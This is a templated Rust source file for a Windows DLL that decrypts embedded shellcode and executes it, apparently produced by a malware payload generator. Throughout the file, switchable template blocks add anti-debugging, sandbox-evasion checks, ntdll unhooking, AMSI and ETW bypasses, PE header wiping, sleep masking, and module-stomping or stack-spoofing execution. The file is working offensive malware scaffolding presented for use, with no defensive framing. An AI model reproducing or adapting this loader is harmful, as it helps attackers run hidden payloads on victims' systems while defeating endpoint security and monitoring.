extern crate scaffold;

#[no_mangle]
pub unsafe extern "system" fn DllMain(
    _: *mut core::ffi::c_void,
    reason: u32,
    _: *mut core::ffi::c_void,
) -> i32 {
    if reason == 1 {
        {{ v.fn_run }}();
    }
    1
}

#[no_mangle]
pub unsafe extern "system" fn DllRegisterServer() { {{ v.fn_run }}(); }

unsafe fn {{ v.fn_run }}() {
    {%- if "AntiDebug" in feature_names %}
    if scaffold::evasion::anti_debug::is_debugged() { return; }
    {%- endif %}
    {%- if "SandboxDomain" in feature_names %}
    if !scaffold::sandbox::domain::is_domain_joined() { return; }
    {%- endif %}
    {%- if "SandboxUser" in feature_names %}
    if !scaffold::sandbox::usercheck::looks_real() { return; }
    {%- endif %}
    {%- if "UnhookDisk" in feature_names %}
    scaffold::evasion::unhook::unhook_ntdll_disk();
    {%- endif %}
    {%- if "UnhookKnownDlls" in feature_names %}
    scaffold::evasion::unhook::unhook_ntdll_knowndlls();
    {%- endif %}
    {%- if "AmsiHwbp" in feature_names %}
    scaffold::bypass::amsi_hwbp::install_amsi_bypass();
    {%- endif %}
    {%- if "EtwHwbp" in feature_names %}
    scaffold::bypass::etw_hwbp::install_etw_bypass();
    scaffold::bypass::etw_hwbp::patch_etw_full();
    {%- endif %}
    {%- if "PeCloak" in feature_names %}
    scaffold::evasion::pe_cloak::wipe_pe_headers();
    {%- endif %}

    let {{ v.var_shellcode }}: &[u8] = &[
        {%- for byte in config.shellcode_hex | hex_bytes %}{{ byte }},{% endfor %}
    ];
    let mut {{ v.var_key }}: [u8; 32] = [
        {%- for byte in masked_key_bytes %}{{ byte }},{% endfor %}
    ];
    for {{ v.bin_lv_ki }} in &mut {{ v.var_key }} { *{{ v.bin_lv_ki }} ^= {{ key_tweak }} as u8; }
    let {{ v.var_iv }}: [u8; 16] = [
        {%- for byte in config.iv_hex | hex_bytes %}{{ byte }},{% endfor %}
    ];
    {%- if config.encryption == "Aes256" %}
    let {{ v.var_ptr }} = scaffold::crypto::decrypt_aes256(
        {{ v.var_shellcode }}, &{{ v.var_key }}, &{{ v.var_iv }}
    ).unwrap();
    {%- else %}
    let {{ v.var_ptr }} = scaffold::crypto::decrypt_chacha20(
        {{ v.var_shellcode }}, &{{ v.var_key }}, &{{ v.var_iv }}
    ).unwrap();
    {%- endif %}

    {%- if "SleepEncrypt" in feature_names %}
    scaffold::evasion::sleep_mask::masked_sleep_jitter(3000);
    {%- endif %}

    {%- if "ModuleStomp" in feature_names %}
    scaffold::inject::exec::run_stomped(&{{ v.var_ptr }});
    {%- elif "StackSpoof" in feature_names %}
    scaffold::inject::exec::run_no_rwx_spoof(&{{ v.var_ptr }});
    {%- else %}
    scaffold::inject::exec::run_no_rwx(&{{ v.var_ptr }});
    {%- endif %}
}
